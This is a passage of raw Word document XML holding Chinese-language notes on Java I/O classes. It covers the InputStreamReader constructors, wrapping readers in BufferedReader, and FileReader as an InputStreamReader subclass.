          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>   = new BufferedReader(new FileReader("foo.in"));</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将缓冲指定文件的输入。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader (Java Platform SE 6) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF9900"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">InputStreamReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF9900"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是字节流通向字符流的桥梁：它使用指定的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF9900"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> charset </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF9900"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取字节并将其解码为字符。它使用的字符集可以由名称指定或显式给定，或者可以接受平台默认的字符集。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF9900"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>构造方法摘要</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader (InputStream  in) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建一个使用默认字符集的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader (InputStream  in, Charset  cs) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建使用给定字符集的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader (InputStream  in, CharsetDecoder  dec) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建使用给定字符集解码器的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader (InputStream  in, String  charsetName) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建使用指定字符集的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>每次调用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStreamReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的一个</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法都会导致从底层输入流读取一个或多个字节。要启用从字节到字符的有效转换，可以提前从底层流读取更多的字节，使其超过满足当前读取操作所需的字节。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为了达到最高效率，可要考虑在</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> BufferedReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内包装</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。例如：</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> BufferedReader in = new BufferedReader(new InputStreamReader(System.in));</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最大的特点是可以指转换的定编码格式，这是其他类所不能的，从构造方法就可看出，这一点在读取中文字符时非常有用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类介绍：</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类的子类，所有方法（</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（）等）都从父类</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中继承而来；</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）与</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类的区别：</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
